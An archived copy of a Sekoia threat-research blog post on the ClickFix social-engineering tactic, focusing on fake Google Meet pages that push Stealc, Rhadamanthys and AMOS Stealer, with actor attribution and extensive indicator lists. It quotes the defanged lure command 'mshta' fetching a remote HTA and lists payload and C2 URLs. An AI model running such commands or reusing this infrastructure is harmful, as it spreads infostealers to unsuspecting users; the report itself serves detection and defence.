{
	"id": "4fb6314d-fffc-422b-abb2-670988b05109",
	"created_at": "2026-04-06T00:18:33.858313Z",
	"updated_at": "2026-04-10T03:33:20.625064Z",
	"deleted_at": null,
	"sha1_hash": "55a007707dd3ffad8290f8344aa09e0bf629d177",
	"title": "ClickFix tactic: The Phantom Meet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2640776,
	"plain_text": "ClickFix tactic: The Phantom Meet\r\nBy Quentin Bourgue\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2024-10-17 · Archived: 2026-04-05 21:57:49 UTC\r\nTable of contents\r\nContext\r\nClickFix in the wild\r\nChronological overview of ClickFix campaigns\r\nVictimology of ClickFix clusters\r\nInvestigation of ClickFix clusters\r\nFake Google Meet pages and technical issues\r\nWindows users targeted with Stealc and Rhadamanthys\r\nMacOS users targeted by AMOS Stealer\r\nTraffers teams operating this ClickFix cluster\r\nConclusion\r\nCluster ClickFix IoCs \u0026 Technical details\r\nFake Google Meet pages and associated infection chain\r\nAdditional clusters allegedly associated to the same traffers teams\r\nExternal references\r\nContext\r\nIn May 2024, a new social engineering tactic called ClickFix emerged, featuring a ClearFake cluster that the\r\nSekoia Threat Detection \u0026 Research (TDR) team closely monitored and analysed in a private report entitled\r\nFLINT 2024-027 – New widespread ClearFake variant abuses PowerShell and clipboard. This tactic involves\r\ndisplaying fake error messages in web browsers to deceive users into copying and executing a given malicious\r\nPowerShell code, finally infecting their systems.\r\nProofpoint researchers, who named this tactic ClickFix, reported1 that the initial access broker TA571 leveraged it\r\nin email phishing campaigns since March 2024. These campaigns primarily used HTML files disguised as Word\r\ndocuments, displaying a fake error window that prompts users to install malware such as Matanbuchus, DarkGate,\r\nor NetSupport RAT via a PowerShell script.\r\nIn recent months, multiple malware distribution campaigns have leveraged the ClickFix lure to spread Windows\r\nand macOS infostealers, botnets, and remote access tools. This is in line with the growing, ongoing trend of\r\ndistributing malware through the drive-by download technique. Sekoia analysts assess that several intrusion sets\r\nrecently adopted this tactic, presumably to evade antivirus software scanning and browser security features,\r\naiming to improve attackers’ infection rates. \r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 1 of 18\n\nIn this blog post, we provide a chronological overview of the observed ClickFix campaigns. We further share\r\ntechnical details about a ClickFix cluster that uses fake Google Meet video conference pages to distribute\r\ninfostealers, targeting both Windows and macOS systems. Sekoia analysts successfully associated this cluster\r\nimpersonating Google Meet with two cybercrime groups: “Slavic Nation Empire (SNE)” and “Scamquerteo“.\r\nThese groups are sub-teams of the cryptocurrency scam teams “Marko Polo” and “CryptoLove“, respectively.\r\nClickFix in the wild\r\nChronological overview of ClickFix campaigns\r\nSince June 2024, various open source reports and Sekoia investigations have revealed malware distribution\r\ncampaigns using the emerging ClickFix tactic. The following figure provides a chronological overview of these\r\ncampaigns. It highlights the malware families involved and the distribution techniques used, which include\r\nphishing emails, compromised websites, and distribution infrastructures.\r\nFigure 1. Overview of malware distribution campaigns using the ClickFix tactic\r\nHere are some examples of malicious websites that impersonate Google Chrome, Facebook, PDFSimpli, and\r\nreCAPTCHA, using the ClickFix social engineering tactic.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 2 of 18\n\nFigure 2. Examples of malicious websites impersonating Google Chrome, Facebook, PDFSimpli,\r\nand reCAPTCHA, using the ClickFix tactic\r\nVictimology of ClickFix clusters\r\nWhile many of these campaigns reportedly aim to broadly target multiple sectors – using websites compromised\r\nby ClearFake or through extensive phishing efforts – some are designed to target specific verticals.\r\nFor instance, Proofpoint identified2 a ClickFix cluster targeting transport and logistics companies in North\r\nAmerica from at least May to August 2024. This campaign uses websites that impersonate transport and fleet\r\noperations management software.\r\nAdditionally, the GitHub issues campaign mainly targeted developers to spread Lumma Stealer by falsely\r\nreporting security vulnerabilities, thereby impacting thousands of public code repositories and exploiting\r\ndevelopers’ trust in GitHub notifications. The goal of this large-scale operation was likely to opportunistically\r\ngather a significant amount of sensitive developer data, which can be used for more targeted attacks in the future. \r\nRecent campaigns uncovered by Sekoia analysts appear to continuously target both businesses and individuals,\r\nusing opportunistic lures such as fake Google Meet pages and Facebook groups.\r\nInvestigation of ClickFix clusters\r\nThe following section provides a detailed analysis of one of the clusters discovered by Sekoia analysts.\r\nFake Google Meet pages and technical issues\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 3 of 18\n\nBy pivoting on the text elements in ClickFix messages displayed to users, such as the phrase “Press the key\r\ncombination” or “CTRL+V”, we discovered several websites masquerading as the homepage of a Google Meet\r\nvideo conference. The sites displayed pop-up windows falsely indicating problems with the microphone and\r\nheadset, as shown on the figure below.\r\nFigure 3. Fake homepage of a Google Meet video conference displaying a pop-up faking technical\r\nissues (ClickFix)\r\nWe identified the following domain names and IP address that we attribute to this cluster with high confidence:\r\nmeet[.]google[.]us-join[.]com\r\nmeet[.]googie[.]com-join[.]us\r\nmeet[.]google[.]com-join[.]us\r\nmeet[.]google[.]web-join[.]com\r\nmeet[.]google[.]webjoining[.]com\r\nmeet[.]google[.]cdm-join[.]us\r\nmeet[.]google[.]us07host[.]com\r\ngoogiedrivers[.]com\r\n77.221.157[.]170\r\nThe phishing URLs imitate legitimate ones with the same pattern for the meeting identifier, e.g.:\r\nhxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj\r\nhxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 4 of 18\n\nhxxps://meet[.]google[.]us07host[.]com/coc-btru-ays\r\nhxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa\r\nWindows users targeted with Stealc and Rhadamanthys\r\nFor Windows users, clicking on the “Try Fix” button results in copying the following command into the clipboard:\r\nmshta hxxps://googIedrivers[.]com/fix-error\r\nThe fix-error file (SHA256: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138) is an\r\nHTML file containing an HTML Application (HTA) which itself contains an obfuscated VBScript. Using a Python\r\nscript3, we deobfuscated it and obtained the following VBScript.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 5 of 18\n\nFigure 4. Deobfuscated VBS script distributed by the cluster of fake Google meetings\r\nUpon execution, the VBS script performs the following actions:\r\n1. It terminates its parent process (mshta.exe).\r\n2. It downloads two executables (stealc.exe and ram.exe) using bitsadmin. After a two-seconds delay, it\r\nnotifies the C2 server (webapizmland[.]com) about the success or failure of running the executables.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 6 of 18\n\n3. It retrieves the victim’s public IP address using the service api.ipify[.]org and sends it to the C2 server\r\nalong the execution status.\r\nThe two executables stealc.exe (SHA256:\r\na834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c) and ram.exe (SHA256:\r\n2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe) are the Stealc and Rhadamanthys\r\npayloads respectively, both protected by the HijackLoader crypter.\r\nIn this campaign, the Stealc C2 server is “hxxp://95.182.97[.]58/84b7b6f977dd1c65.php” and the Rhadamanthys\r\nC2 server is “hxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p”. Both IP addresses were\r\nalready known by our CTI database following the Sekoia.io C2 Trackers monitoring routine, as we proactively\r\ntrack the C2 infrastructure of these two infostealer families sold as Malware-as-a-Service.\r\nNotably, the name of the Stealc botnet “sneprivate24” suggests that the traffer4 group “Slavic Nation Empire\r\n(SNE)” was behind this campaign. Further details about this association can be found in the section “Traffers\r\nteams operating this ClickFix cluster”.\r\nMacOS users targeted by AMOS Stealer\r\nFor macOS users, clicking on the “Try Fix” button results in downloading the file Launcher_v1.94.dmg (SHA256:\r\n94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5), using the following HTTP requests:\r\n1. A GET request to hxxps://carolinejuskus[.]com/kusaka.php?call=launcher, where the server responds with\r\na second URL in the HTTP header Location.\r\n2. A GET request to\r\nhxxps://carolinejuskus[.]com/f9dfbcf6a999/7cc2f5dc3c76/load.51f8527e20dcb05ffd8586b853937a8a.php?\r\ncall=launcher, which returns the malicious payload.\r\nWe identified the payload Launcher_v1.94.dmg (SHA256:\r\n94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) as AMOS Stealer, which\r\ncommunicates with its C2 server at “hxxp://85.209.11[.]155/joinsystem”.\r\nSekoia actively tracks this infrastructure characterised by the /kusaka.php endpoint. Since at least May 2024, this\r\nendpoint is used in campaigns redirecting users from malicious websites to download the AMOS Stealer. It is\r\nlikely used to protect the payload from unwanted traffic, such as downloads by bots or scans by security products.\r\nWe identified the following domain names associated with this macOS malware distribution infrastructure:\r\nalienmanfc6[.]com\r\napunanwu[.]com\r\nbowerchalke[.]com\r\ncarolinejuskus[.]com\r\ncautrucanhtuan[.]com\r\ncphoops[.]com\r\ndekhke[.]com\r\niloanshop[.]com\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 7 of 18\n\nkansaskollection[.]com\r\nlirelasuisse[.]com\r\nmdalies[.]com\r\nmensadvancega[.]com\r\nmishapagerealty[.]com\r\nmodoodeul[.]com\r\npabloarruda[.]com\r\npakoyayinlari[.]com\r\npatrickcateman[.]com\r\nphperl[.]com\r\nstonance[.]com\r\nutv4fun[.]com\r\nGiven the variety of initial malicious websites redirecting to this infrastructure, we assess with high confidence\r\nthat it is shared among multiple threat actors. They collaborate within a centralised traffers team to share certain\r\nresources, including this infrastructure and the AMOS Stealer, which is also sold as Malware-as-a-Service.\r\nTraffers teams operating this ClickFix cluster\r\nSlavic Nation Empire (SNE): a sub-group of Marko Polo\r\nThe attacker’s server hosts an interesting JavaScript code at hxxp://77.221.157[.]170:3004/server.js5, which is a\r\nbackend code related to this distribution infrastructure. In brief, this JavaScript connects to a MongoDB database\r\nto retrieve worker’s information, and sends statistics to two Telegram bots when users visited the malicious\r\nGoogle Meet websites and successfully downloaded the payload. We would like to thank the cybersecurity\r\nresearcher Karol Paciorek from the CSIRT KNF team for sharing this discovery with us6.\r\nThe following is an excerpt of the JavaScript code that includes the message sent to the two Telegram bots.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 8 of 18\n\nFigure 5. Excerpt of attacker’s backend code exfiltrating data to Telegram bots, used by the\r\nClickFix cluster “fake Google meetings” \r\nThe attacker uses this backend to track compromises and visits for this ClickFix cluster.\r\nBy extracting the chat logs of the Telegram bots “#SNE | GMEET OTSTUK” using the Telegram API, we\r\ndiscovered a discussion between sparkhash, the alleged developer of this ClickFix cluster, and the traffer Alexmen.\r\nOur investigation revealed that both threat actors are members of the traffers team “Slavic Nation Empire (SNE)“,\r\nwhich is a sub-team of the cryptocurrency scam team “Marko Polo“.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 9 of 18\n\nFigure 6. Extract of a Telegram bot discussion between the alleged operator and a possible affiliate\r\nof the cluster “fake Google Meet pages”\r\nCybercriminals frequently use Telegram bots to monitor their activities, especially when this involves working in\r\na team and collaborating with affiliates (traffers/workers).\r\nBased on our analysis of this cluster’s activities and the messages shared between the threat actors operating and\r\nusing it, Sekoia analysts advance the following hypothesis:\r\nThe threat actor sparkhash deployed the GMeet cluster for the benefit of the traffers team “Slavic\r\nNation Empire (SNE)“ in charge of generating traffic to this cluster.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 10 of 18\n\nThis team of traffers could be administered by the threat actor Alexmen who oversees the distribution\r\nclusters activities and possibly manages infostealers licences, relying on external services.\r\nThe traffers, also known as affiliates or workers, spread the malicious URLs to potential victims,\r\nredirecting them to this cluster. For example, the cybercriminal going by the handle web3huntereth may\r\nhave infected a victim, or himself as part of a test, in Poland, as indicated by the download statistics from\r\nthe Telegram bot.\r\nTDR confidently associate this cluster impersonating Google Meet with the traffers team “Slavic Nation\r\nEmpire (SNE)”, also known as “Slavice Nation Land”. This team provides its members a comprehensive kit for\r\nsophisticated scams targeting users of cryptocurrency assets, Web3 applications, decentralised finance, and NFT.\r\nThe kit includes landing pages impersonating software and video conferencing webpages, along with infostealers,\r\ndrainers, and automation tools to coordinate attacks.\r\nThe traffers team “Slavic Nation Empire (SNE)” is a sub-group of the cryptocurrency scam team “Marko Polo”\r\nand part of the Russian-speaking cybercrime ecosystem. We would like to thank the cybersecurity researcher\r\ng0njxa for sharing some valuable hints on these groups with us. Additionally, Recorded Future researchers have\r\npublished two reports detailing Marko Polo campaigns78.\r\nScamquerteo Team: a sub-group of CryptoLove\r\nMoreover, we discovered that the traffers team “Scamquerteo” also used this ClickFix cluster impersonating\r\nGoogle Meet, specifically using the FQDN “meet[.]google[.]webjoining[.]com” to spread malware. The traffers\r\nteam “Scamquerteo Team” is a sub-group of the cryptocurrency scam team “CryptoLove” and part of the\r\nRussian-speaking cybercrime ecosystem.\r\nDuring our investigation, we were able to interact with their Telegram bot, which manages operating the traffers\r\nactivities for the fake Google Meet cluster, as shown by the following figure.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 11 of 18\n\nFigure 7. Interaction with the Scamquerteo’s Telegram bot to generate a fake Google Meet page\r\nBoth traffers teams, “Slavic Nation Empire (SNE)” and “Scamquerteo“, use the same ClickFix template that\r\nimpersonates Google Meet. This discovery suggests that these teams share materials, also known as “landing\r\nproject”, as well as infrastructure.\r\nSekoia analysts assess with medium confidence that both teams use the same cybercrime service to supply\r\nthem with this fake Google Meet cluster, that remains unknown at the time of writing. Additionally, it is likely\r\nthat a third party manages their infrastructure or registers their domain names.\r\nConclusion\r\nClickFix is an emerging social engineering tactic first observed in 2024. As of September 2024, several\r\nintrusion sets already adopted it to widely distribute malware through email phishing campaigns, compromised\r\nwebsites, and distribution infrastructures.\r\nThe ClickFix tactic deceives users into downloading and running malware on their machines without\r\ninvolving a web browser for download or requiring manual file execution. It makes it possible to bypass web\r\nbrowser security features, such as Google Safe Browsing, and to appear less suspicious to unsuspecting corporate\r\nand individual users.\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 12 of 18\n\nThe ClickFix cluster analysed in this blog post employs a decoy that could be particularly devastating in\r\ncampaigns targeting organisations that use Google Workspace, especially Google Meet. The investigation into\r\nthe traffers team distributing this cluster suggests that it primarily targets cryptocurrency assets, Web3\r\napplications, decentralised finance, and NFT users. However, we believe that similar social engineering\r\ntechniques could be employed in other malware distribution campaigns.\r\nCluster ClickFix IoCs \u0026 Technical details\r\nThe list of IoCs is available on Sekoia.io GitHub repository.\r\nFake Google Meet pages and associated infection chain\r\nPhishing domains impersonating Google Meet:\r\nmeet[.]google[.]us-join[.]com\r\nmeet[.]googie[.]com-join[.]us\r\nmeet[.]google[.]com-join[.]us\r\nmeet[.]google[.]web-join[.]com\r\nmeet[.]google[.]webjoining[.]com\r\nmeet[.]google[.]cdm-join[.]us\r\nmeet[.]google[.]us07host[.]com\r\ngoogiedrivers[.]com\r\n77.221.157[.]170\r\nPhishing URLs impersonating Google Meet pages:\r\nhxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj\r\nhxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh\r\nhxxps://meet[.]google[.]us07host[.]com/coc-btru-ays\r\nhxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa\r\nInfection chains:\r\ngoogiedrivers[.]com (payload download)\r\nus18web-zoom[.]us (payload download)\r\nwebapizmland[.]com (fingerprint data exfiltration)\r\ncarolinejuskus[.]com (macOS payload download)\r\n95.182.97[.]58 (Stealc C2)\r\n91.103.140[.]200 (Rhadamanthys C2)\r\n85.209.11[.]155 (AMOS Steaker C2)\r\nhxxps://googIedrivers[.]com/fix-error (payload download)\r\nhxxps://us18web-zoom[.]us/stealc.exe (payload download)\r\nhxxps://us18web-zoom[.]us/ram.exe (payload download)\r\nhxxps://webapizmland[.]com/api/cmdruned (payload download)\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 13 of 18\n\nhxxp://95.182.97[.]58/84b7b6f977dd1c65.php (Stealc C2)\r\nhxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p (Rhadamanthys C2)\r\nhxxps://carolinejuskus[.]com/kusaka.php?call=launcher (macOS payload download)\r\nhxxp://85.209.11[.]155/joinsystem (AMOS Stealer C2)\r\n92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138 (malicious HTML payload)\r\na834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c (Stealc payload)\r\n2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe (Rhadamanthys payload)\r\n94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5 (AMOS Stealer payload)\r\nAMOS Stealer distribution infrastructure:\r\nalienmanfc6[.]com\r\napunanwu[.]com\r\nbowerchalke[.]com\r\ncarolinejuskus[.]com\r\ncautrucanhtuan[.]com\r\ncphoops[.]com\r\ndekhke[.]com\r\niloanshop[.]com\r\nkansaskollection[.]com\r\nlirelasuisse[.]com\r\nmdalies[.]com\r\nmensadvancega[.]com\r\nmishapagerealty[.]com\r\nmodoodeul[.]com\r\npabloarruda[.]com\r\npakoyayinlari[.]com\r\npatrickcateman[.]com\r\nphperl[.]com\r\nstonance[.]com\r\nutv4fun[.]com\r\nAdditional clusters allegedly associated to the same traffers teams\r\nSekoia.io TDR uncovered a large-scale malware distribution infrastructure allegedly associated with several\r\ntraffers team which use the fake Google Meet cluster. This infrastructure was unveiled based on passive DNS,\r\nWhois lookups, and HTML similarities, such as title, text, favicon and resources.\r\nThis infrastructure includes webpages impersonating platforms like Zoom, video games, office software, and fake\r\nWeb3 applications, which spread Stealc, Rhadamanthys, and AMOS Stealer to Web3 gamers.\r\nZoom cluster\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 14 of 18\n\nus01web-zoom[.]us\r\nus03web-zoom[.]us\r\nus07web-zoom[.]us\r\nus08web-zoom[.]us\r\nus09web-zoom[.]us\r\nus10web-zoom[.]us\r\nus18web-zoom[.]us\r\nus30web-zoom[.]us\r\nus40web-zoom[.]us\r\nus45web-zoom[.]us\r\nus50web-zoom[.]us\r\nus60web-zoom[.]us\r\nus70web-zoom[.]us\r\nus77web-zoom[.]us\r\nus80web-zoom[.]us\r\nus85web-zoom[.]us\r\nus95web-zoom[.]us\r\nus004web-zoom[.]us\r\nus005web-zoom[.]us\r\nus006web-zoom[.]us\r\nus007web-zoom[.]us\r\nus008web-zoom[.]us\r\nus050web-zoom[.]us\r\nus055web-zoom[.]us\r\nus500web-zoom[.]us\r\nus505web-zoom[.]us\r\nus555web-zoom[.]us\r\nus002webzoom[.]us\r\nus003webzoom[.]us\r\nus4web-zoom[.]us\r\nus5web-zoom[.]us\r\nus6web-zoom[.]us\r\nus01web[.]us\r\nus03web[.]us\r\nus08web[.]us\r\nus09web[.]us\r\nus15web[.]us\r\nus20web[.]us\r\nus40web[.]us\r\nus50web[.]us\r\nus55web[.]us\r\nweb05-zoom[.]us\r\nwebroom-zoom[.]us\r\nPDF reader cluster (office software)\r\ndoculuma[.]com\r\nfatoreader[.]com\r\nfatoreader[.]net\r\ngamascript[.]com\r\nverdascript[.]com\r\nveriscroll[.]com\r\nLunacy / Calipso (fake video game)\r\ncalipsoproject[.]com\r\nlunacy3[.]com\r\nlunacy4[.]com\r\nprojectcalipso[.]com\r\nthecalipsoproject[.]com\r\nweb3dev[.]buzz\r\nULTIMATE / BATTLEFORGE (fake video game)\r\nbattleforge[.]cc\r\nbattleultimate[.]xyz\r\nmybattleforge[.]xyz\r\nmyultimate[.]xyz\r\nplaybattleforge[.]org\r\nplaybattleforge[.]xyz\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 15 of 18\n\nplayultimate[.]xyz\r\ntooldream[.]live\r\nultimategame[.]xyz\r\nultimateplay[.]xyz\r\nRAGON GAME (fake video game)\r\nargongame[.]com\r\ndarkblow[.]com\r\nmissingfrontier[.]com\r\nnightpredators[.]com\r\nriotrevelry[.]com\r\nthewatch[.]com\r\nus12web[.]us\r\nweb3dev[.]buzz\r\nwebjoining[.]com\r\nWeb3 web browser\r\nsleipnirbrowser[.]org\r\nsleipnirbrowser[.]xyz\r\nCozy World Metaverse\r\ncozyland[.]xyz\r\ncozymeta[.]com\r\ncozymeta[.]fun\r\ncozymeta[.]xyz\r\ncozyweb3[.]com\r\ncozyworld[.]io\r\nworldcozy[.]com\r\nNGT Studio\r\nngtmeta[.]io\r\nngtmetaland[.]io\r\nngtmetaweb[.]com\r\nngtproject[.]com\r\nngtstudio[.]io\r\nngtstudio[.]online\r\nngtverse[.]org\r\nnight-support[.]xyz\r\nnightstudio[.]io\r\nnightstudioweb[.]xyz\r\nNortex Web3 Messaging App\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 16 of 18\n\nlastnuggets[.]com\r\nmor-dex[.]world\r\nmordex[.]blog\r\nmordex[.]digital\r\nmordex[.]homes\r\nnor-tex[.]eu\r\nnor-tex[.]pro\r\nnor-tex[.]world\r\nnor-tex[.]xyz\r\nnort-ex[.]eu\r\nnort-ex[.]lol\r\nnort-ex[.]world\r\nnortex-app[.]pro\r\nnortex-app[.]us\r\nnortex-app[.]xyz\r\nnortex[.]app\r\nnortex[.]blog\r\nnortex[.]digital\r\nnortex[.]life\r\nnortex[.]limited\r\nnortex[.]lol\r\nnortex[.]uk\r\nnortexapp[.]com\r\nnortexapp[.]digital\r\nnortexapp[.]io\r\nnortexapp[.]me\r\nnortexapp[.]pro\r\nnortexapp[.]xyz\r\nnortexmessenger[.]blog\r\nnortexmessenger[.]digital\r\nnortexmessenger[.]pro\r\nnortexmessenger[.]us\r\nExternal references\r\n1. https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn ↩︎\r\n2. https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering ↩︎\r\n3. https://gist.github.com/qbourgue/e7959e4089c1993045e01cb9c3cbc6a5 ↩︎\r\n4. https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem/ ↩︎\r\n5. https://urlscan.io/result/d77b2603-e586-403b-ae49-90523269510a/ ↩︎\r\n6. https://x.com/karol_paciorek/status/1838878695269728455 ↩︎\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 17 of 18\n\n7. https://www.recordedfuture.com/research/the-travels-of-markopolo-self-proclaimed-meeting-software-vortax-spreads-infostealers ↩︎\r\n8. https://www.recordedfuture.com/research/marko-polo-navigates-uncharted-waters-with-infostealer-empire\r\n↩︎\r\nFeel free to read other Sekoia.io TDR (Threat Detection \u0026 Research) analysis here :\r\nShare\r\nCTI Cybercrime Infrastructure\r\nShare this post:\r\nSource: https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/"
	],
	"report_names": [
		"clickfix-tactic-the-phantom-meet"
	],
	"threat_actors": [
		{
			"id": "4fad0171-9089-4bc8-83c5-727ee455f6fe",
			"created_at": "2024-06-25T02:00:05.035985Z",
			"updated_at": "2026-04-10T02:00:03.657798Z",
			"deleted_at": null,
			"main_name": "Markopolo",
			"aliases": [],
			"source_name": "MISPGALAXY:Markopolo",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7183913d-9a43-4362-96e1-9af522b6ab84",
			"created_at": "2024-06-19T02:00:04.377344Z",
			"updated_at": "2026-04-10T02:00:03.653777Z",
			"deleted_at": null,
			"main_name": "TA571",
			"aliases": [],
			"source_name": "MISPGALAXY:TA571",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434713,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55a007707dd3ffad8290f8344aa09e0bf629d177.pdf",
		"text": "https://archive.orkl.eu/55a007707dd3ffad8290f8344aa09e0bf629d177.txt",
		"img": "https://archive.orkl.eu/55a007707dd3ffad8290f8344aa09e0bf629d177.jpg"
	}
}